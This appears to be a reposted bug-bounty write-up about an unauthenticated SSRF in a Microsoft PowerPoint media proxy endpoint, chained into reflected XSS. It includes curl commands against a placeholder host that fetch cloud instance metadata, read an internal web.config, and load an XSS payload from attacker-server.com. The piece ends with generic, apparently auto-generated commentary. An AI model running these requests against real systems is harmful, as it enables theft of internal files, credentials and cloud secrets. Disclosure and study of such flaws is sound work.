Listen to this Post
🚀 One hour of research → $8,000 bounty.
📌 Unauthenticated SSRF → Internal file access & cloud metadata leak.
🕵️ Chained into full XSS, no authentication required.
🔍 How I Found It (In Just One Hour!)
While reviewing Microsoft PowerPoint’s client-side source code during research at SecCreative LTD, I found an interesting API call to the endpoint MediaDownloadHandlerProxy.ashx.
👉 No authentication required (accepts unauthenticated GET requests).
👉 Expects multiple GET parameters (which we reverse-engineered from research).
The key parameter we found:
🔹 mediaSnapServiceDomain – A user-controlled domain (without a path) that the backend blindly trusts and requests.
🚀 SSRF – Internal Network Access 🚀
1️⃣ Step 1: Backend Requests Metadata
Requests /MediaDownloadGetMetadata.ashx
Passes all GET parameters.
Expects a structured JSON response (which I reverse-engineered and replicated on our server).
2️⃣ Step 2: Backend Fetches “Media”
If the JSON response is valid, the backend requests:
/MediaDownloadHandler.ashx
The mediaSnapServiceDomain response is fully reflected to the attacker doing the SSRF. INCLUDING redirects! Oh… and it also forwards our headers from the SSRF request. Did someone say “Metadata: true”? 😏
🔥SSRF – Internal Network Access🔥
Since the backend blindly follows redirects and return response, we can use this to access internal services:
✅ Redirect to localhost → Fetch internal files (💡 “That web.config looks nice when it’s supposed to be localhost-only… 🥰 ” )
✅ Redirect to cloud metadata → Leak instance info – hxxp://169,254,169,254/metadata/v1/instanceinfo
🚨 Impact:
💡 Leak internal credentials, storage keys, or internal cloud infrastructure details.
💡 Potential RCE (if credentials allow further exploitation, and web.config might contain a MachineKey).
💡 Internal Network scanning.
💥 Game over? Almost. But we stopped the PoC before RCE to respect and comply with Microsoft Bug Bounty program rules.
🎯 Chaining SSRF into XSS
Since we control mediaSnapServiceDomain, we dictate how the backend behaves. By returning a valid JSON response for the first request, we pass validation and then deliver an XSS payload with content-type: text/html.
💥 Outcome:
- Reflected XSS on every browser. one vulnerable URL → Two backend requests → Instant XSS.
- No parameter tampering needed.
- Zero validation on returned content.
Practice Verified Codes and Commands:
1. SSRF Exploitation with cURL:
curl -v "http://vulnerable-site.com/MediaDownloadHandlerProxy.ashx?mediaSnapServiceDomain=http://169.254.169.254/metadata/v1/instanceinfo"
2. XSS Payload Injection:
curl -v "http://vulnerable-site.com/MediaDownloadHandlerProxy.ashx?mediaSnapServiceDomain=http://attacker-server.com/xss-payload"
3. Internal File Access:
curl -v "http://vulnerable-site.com/MediaDownloadHandlerProxy.ashx?mediaSnapServiceDomain=http://localhost/web.config"
4. Cloud Metadata Leak:
curl -v "http://vulnerable-site.com/MediaDownloadHandlerProxy.ashx?mediaSnapServiceDomain=http://169.254.169.254/metadata/v1/instanceinfo"
What Undercode Say:
In the realm of cybersecurity, the discovery of vulnerabilities like SSRF and XSS in widely-used software such as Microsoft PowerPoint underscores the importance of rigorous security research. The ability to chain these vulnerabilities together to achieve significant impact, such as internal network access and potential RCE, highlights the critical need for robust security measures in software development.
The exploitation of SSRF to access internal files and cloud metadata is a stark reminder of the dangers of blindly trusting user-controlled inputs. The use of tools like cURL to simulate these attacks provides a practical understanding of how such vulnerabilities can be exploited. For instance, the command `curl -v “http://vulnerable-site.com/MediaDownloadHandlerProxy.ashx?mediaSnapServiceDomain=http://localhost/web.config”` demonstrates how an attacker can retrieve sensitive internal files.
Moreover, the chaining of SSRF into XSS, as shown with the command curl -v "http://vulnerable-site.com/MediaDownloadHandlerProxy.ashx?mediaSnapServiceDomain=http://attacker-server.com/xss-payload", illustrates the potential for widespread impact with minimal effort. This emphasizes the need for comprehensive input validation and output encoding to prevent such attacks.
In conclusion, the findings from this research serve as a valuable lesson in the importance of proactive security measures. By understanding and mitigating vulnerabilities like SSRF and XSS, organizations can significantly reduce their attack surface and protect their critical assets. The use of verified commands and codes in this article provides a practical approach to understanding and addressing these security challenges.
For further reading on SSRF and XSS vulnerabilities, consider the following resources:
– OWASP SSRF Cheat Sheet
– OWASP XSS Prevention Cheat Sheet
– Microsoft Security Response Center
References:
initially reported by: https://www.linkedin.com/posts/guy-h087_8000-bounty-ssrf-xss-in-microsoft-ugcPost-7296100075456356352-17-9 – Hackers Feeds
Extra Hub:
Undercode AI
